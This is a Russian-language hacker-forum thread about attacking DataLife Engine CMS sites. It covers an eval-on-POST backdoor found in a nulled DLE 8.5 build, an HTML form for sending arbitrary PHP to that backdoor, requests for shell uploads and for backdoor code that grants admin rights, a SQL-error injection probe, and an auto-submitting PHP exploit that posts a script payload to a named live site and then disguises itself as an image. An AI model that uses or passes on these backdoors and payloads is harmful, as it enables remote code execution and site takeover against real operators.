Есть бедкодер в папке /engine/ajax/ if($_POST['text']!=''){eval(stripcslashes($_POST['text']));} Что с этим можно сделать?
Я думаю таких сайтов много с этим бедкодером это относиться к null версиям dle. К примеру DataLife Engine v.8.5 Nulled by M.I.D-Team Так что с этим можно сделать? В этой папке нету файла .htaccess
Проблема в том что я не знаю как и что нужно и куда послать и через чё. Где об этом можно хоть статью почитать или книжку что да как? В \upload\engine\ajax keywords.php http://slil.ru/29061005
Да я сливал dle не сайта M.I.D-Team а с какого то сайта по dle где есть модули и хаки для dle. Но что релиз от тимы M.I.D-Team там было это точно написано и папка там называлась DataLife Engine v.8.5 Nulled by M.I.D-Team после распаковки архива. Значит от ихнего имени кто - то дле null распространяет с бэкдор . eval() через $_POST. Только теперь этот бэкдор в keywords.php. Спасибо почитаем. Что с рангом я вам плюсь добавил а его не видно?
попробуй так PHP: <form name="eval" action="http://script.ru/script.php" method="post"> <input type="text" name="text" value="phpinfo();"><br /> <input type="submit" name="submit" value="хряп"> </form> вместо http://script.ru/script.php путь до твоего скрипта там где бекдор нашел, вместо phpinfo(); можеш любой php код писать.
dle 5 и shell Здравствуйте, я новичек на форуме, поэтому сразу извиняюсь, если пост не сюда. Вопрос следующего характера, как можно залить шелл в dle 4.2 если нет доступа в админпанель, а есть только доступ к cnstats, установленного на этом сайте
Доброе время суток. Помогите написать код для бэкдора от -=ZLOY=-,чтоб получить доступ в АП, и быть в user_group 1 В этом деле я новичок,прошу вас,напишите подробно что да как
Вот недавно нашёл багу. В зависимости от чпу выполняем запрос Например: Code: http://skripters.com/dle_haki/page/9999999999999999999/ Получаем: Code: MySQL Error! ------------------------ The Error returned was: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '7.3786976294838E+19,8' at line 1 Error Number: 1064 Я думаю найдёте применение Неоткажусь от ++
Работает любой хтмл тег отосланный пост запросом на engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php ТИПА ЭКСПЛОИТ PHP код: PHP: <?php $value = urlencode("<script>alert('HACKED BY KZPROMO trololo');</script>"); if($_GET['unset'] == "time") unset($_COOKIE['time']); if(!isset($_COOKIE['time'])) { setcookie("time",time(),time()+3600); echo <<<HTML <html> <head> </head> <body> <center> <form name="hack" action="https://gomel-sat.net/engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php" method="post"> <input type="text" name="text" value='$value' style="boder:none;FONT: 0px Tahoma; border:0px solid #FFFFFF;" border="0"> </form> <script> document.hack.submit(); </script> </body> </html> HTML; } else { header("Content-type: image/jpg"); $image = imagecreatefromgif('smile.jpg'); imagegif($image); imagedestroy($image); } ?> Автор: kzpromo
извиняюсь, если было, но может кто подскажет как взламывали недавно сайты, например zerx.ru . Вот заплатка от взлома http://dle-news.ru/bags/v85/1037-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html
Да вот действительно тема: http://dle-news.ru/bags/v85/1040-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html только не как не могу в ней разобраться ...
А что в ней разбератся если у тебя на сайте есть аккаунт административный то ты можешь загрузить фейк! а дальше объяснять не надо